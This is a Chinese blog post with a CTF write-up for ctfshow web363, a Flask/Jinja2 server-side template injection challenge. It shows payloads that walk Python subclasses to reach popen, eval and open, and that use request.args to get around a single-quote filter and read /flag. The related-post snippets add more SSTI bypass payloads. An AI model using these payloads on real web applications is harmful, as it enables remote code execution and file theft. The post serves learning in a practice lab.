ctfshow-web363(SSTI)

最新推荐文章于 2024-03-16 16:34:27 发布
最新推荐文章于 2024-03-16 16:34:27 发布
阅读量400 收藏
点赞数 1
文章标签: p2p 网络协议 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/124511040
版权

过滤了'

?name={{[].__class__.__base__.__subclasses__()}}

?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}

法一: 

本来应该这样的 ?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}

但是单引号被过滤了

 引号被过滤了无法执行,把'popen'先换成request.args.a(这里的a可以理解为自定义的变量,名字可以任意设置),让a=popen

同样的,命令执行'ls'也要换

法二:

这里的关键是加了一个builtins,然后语句就有些不一样了

[].__class__.__bases__[0].__subclasses__()[132].__init__.__globals__.__builtins__下有eval,__import__等的全局函数,可以利用此来执行命令:

格式也可以是这样的

[].__class__.__bases__[0].__subclasses__()[59].__init__.__globals__['__builtins__']['eval']("__import__('os').popen('id').read()")

?name={{[].__class__.__bases__[0].__subclasses__()[132].__init__.__globals__.__builtins__[request.args.a](request.args.b).read()}}&a=open&b=/flag

open就是打开文件的函数,所以不用cat(应该是这样)

 

m0_62094846
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).conc
SSTI模板注入-单双引号被过滤绕过(ctfshow web入门363)
T1ngSh0w的博客
03-18 451
我们获取基类以及所有子类的时候,可以使用()或者[]来获取。当我们使用可以执行shell命令的方法时,必定要使用单引号或者双引号来包裹我们执行的命令,这时我们可以使用request.args.参数名或者request.values.参数名等传参方式将我们的命令等需要引号包裹的字符串进行传参即可。
ctfshow---web入门---SSTI(361-368)
最新发布
2301_80470992的博客
03-16 400
根据题目给的“名字就是考点”,所以构建playloadstrstrobjectobjectobject[132].__init____init__['popen']popenos.popen。
ctfshow-web366,367(SSTI)
m0_62094846的博客
05-05 244
_ args [ ' 都被过滤了 有绕过_的方法,但是因为过滤了[,也过滤了args,所以没法用 用attr的话还是会有_,还要加一个和request.args作用相似的东西,request.cookies
Bugku CTF——WEB之SSTI学习笔记
qq_51096893的博客
12-19 4099
目录 知识前提 一.题目 二 .理解和学习 三.总结 我们在作为新手去开始进行这些题目的联系的时候只知道一些操作,而不知道原理,这里为新手简单介绍一些SSTI的概念和操作。 知识前提 我们通过实例去一起学习。学习这个之前,我们要知道以下几点: (1)什么是CTF(Capture The Flag) (2)CTF题目类型(我们今天讲解的是WEB类型中注入问题): 1.MISC(Miscellaneous)类型,即安全杂项,题目或涉及流量分析、电子取证、人肉搜索、数据分析等等。 2.P.
(二)黑马javaweb364集-过滤器登陆认证绕过问题
丶没胡子的猫
09-18 369
目录(二)黑马javaweb364集-过滤器登陆认证绕过问题加固 (二)黑马javaweb364集-过滤器登陆认证绕过问题 ​ 课程内容大致是利用Filter进行过滤,如果没有登陆,就会跳转到login.jsp页面 黑马java364集https://www.bilibili.com/video/BV1qv4y1o79t?p=364 代码: package cn.itcast.web.filter; import javax.servlet.*; import javax.servlet.annot
ctfshow web入门 ssti web361~web372
qq_62989306的博客
09-13 1236
ssti之数字绕过、request绕过、字符串拼接、chr绕过、反弹绕过、dnslog外带、读文件盲注……
CTFshow 命令执行 web32 33 34 35 36
ChenD的学习笔记
11-08 833
CTFshow 命令执行 web32 web33 web34 web35 web36
ctfshow-web364(SSTI)
m0_62094846的博客
04-30 524
用上题的方法,发现还是有东西被过滤了 筛选后发现是args 过滤了引号和args,上题的姿势不能用了,但是可以用chr()函数绕过。 可以用这个payload判断chr()函数的位置: {{().__class__.__bases__[0].__subclasses__()[§0§].__init__.__globals__.__builtins__.chr}} 用bp跑后发现有这几个,可以任意取 取80 分析一下别人的wp(现在的水平也只能这样了) ?name={%...
ctfshow web入门(SSTI
m0_62422842的博客
06-18 1282
ctfshow的web入门中ssti题目的总结
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知道的新姿势.pdf
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
2015年黑帽大会上 James Kettle 讲解了《Server-Side Template Injection: RCE for the modern webapp》,从服务端模板注入的形成到检测,再到验证和利用都进行了详细的介绍,本资源为原文。
高级java笔试题-Web-Security-Learning:网络安全学习https://chybeta.github.io/2017/08
06-03
在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。 同步更新于: 01月29日更新: 新收录文章 mysql MSSQL postgresql 前端安全 php java-Web redis SSTI 信息搜集 渗透 Web-...
CTF Web各种题目的解题姿势
07-27
第1章 注入类 课时1:SQL注入原理与利用 19'40 课时2:SQL注入宽字节原理与利用42'08 课时3:SQL Union注入原理与利用01'01'54 课时4:SQL注入布尔注入50'02 ... 课时3:8.3-SSTI Trick技巧27'13
SSTI模板注入-args、单双引号被过滤绕过(ctfshow web入门364)
T1ngSh0w的博客
03-18 213
当单双引号被过滤时,我们使用()或者[]来获得我们所需要的类,并且我们是尝试使用传参的方式将我们的shell命令传进去执行,但是当args也被过滤的时候,我们就不能使用request.args.参数名 来进行传参了。我这里的绕过方法有两种,一种是我们获得chr()这个python的内置函数,chr(ascii值)函数接收一个字符的ascii码值然后将该ascii码值所对应的字符返回,这时我们就可以使用chr(ascii值)得到我们想要的字符,然后将其进行拼接成我们想要的字符串或者shell命令。
[Web安全学习] SSTL模板注入总结
Y1seco的博客
08-18 1335
前置知识 引自 bfengj __class__ 类的一个内置属性,表示实例对象的类。 __base__ 类型对象的直接基类 __bases__ 类型对象的全部基类,以元组形式,类型的实例通常没有属性 __bases__ __mro__ 此属性是由类组成的元组,在方法解析期间会基于它来查找基类。 __subclasses__() 返回这个类的子类集合,Each class keeps a list of w
Vulhub Flask SSTI漏洞复现
CyhDl666的博客
03-26 915
文章目录环境搭建漏洞复现python3python2CTFSHOWWEB361WEB362WEB363 环境搭建 首先利用docker搭建好环境 docker-compose up -d docker ps查看搭建的端口:8000 漏洞复现 开始复现 flask-ssti漏洞以前有总结过 整理的不够好 今天重新整理一下 题目源码 from flask import Flask, request from jinja2 import Template app = Flask(__name__)
【Web】Ctfshow SSTI刷题记录1
uuzeray的博客
11-19 1195
题目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
ctfshow ssti
07-27
CTFShow SSTI(Server-Side Template Injection)是一个与安全相关的话题,它涉及到服务器端模板注入漏洞。在某些情况下,当应用程序接受用户输入并将其作为模板的一部分进行解析时,攻击者可以利用这个漏洞来执行任意代码或获取敏感信息。 在CTF(Capture The Flag)比赛中,SSTI是一类常见的漏洞类型。攻击者可以通过构造特定的输入来绕过应用程序的过滤机制,成功注入恶意代码,从而导致服务器端执行该代码。 为了防止SSTI漏洞,开发人员应该谨慎处理用户输入,并在解析模板时使用安全的方法,如使用模板引擎提供的过滤器或转义函数。此外,安全审计和代码审查也是发现和修复SSTI漏洞的重要步骤。 如果你对SSTI漏洞有更具体的问题或需要进一步的解释,请告诉我。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值